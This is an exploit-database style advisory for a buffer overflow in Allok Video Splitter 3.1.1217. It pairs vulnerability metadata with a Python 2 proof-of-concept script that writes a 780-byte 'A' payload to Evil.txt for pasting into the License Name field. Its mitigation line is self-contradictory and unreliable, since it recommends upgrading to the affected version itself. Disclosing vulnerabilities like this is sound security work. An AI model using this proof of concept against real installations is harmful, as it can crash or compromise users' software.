Allok Video Splitter 3.1.1217

vendor:

Allok Video Splitter

by:

Achilles

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Allok Video Splitter

Affected Version From: 3.1.1217

Affected Version To: 3.1.1217

Patch Exists: YES

Related CWE: N/A

CPE: a:alloksoft:allok_video_splitter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 64-bit DE

2018

Allok Video Splitter 3.1.1217

A buffer overflow vulnerability exists in Allok Video Splitter 3.1.1217, which allows an attacker to execute arbitrary code by copying the contents of a specially crafted file into the License Name field and clicking Register. This can be exploited to execute arbitrary code with the privileges of the user running the application.

Mitigation:

Upgrade to the latest version of Allok Video Splitter 3.1.1217

Source

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Allok Video Splitter 3.1.1217
# Date: 2018-05-09
# Exploit Author: Achilles
# Vendor Homepage: http://www.alloksoft.com/
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################

#!/usr/bin/python
  
buffer = "A" * 780
  
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"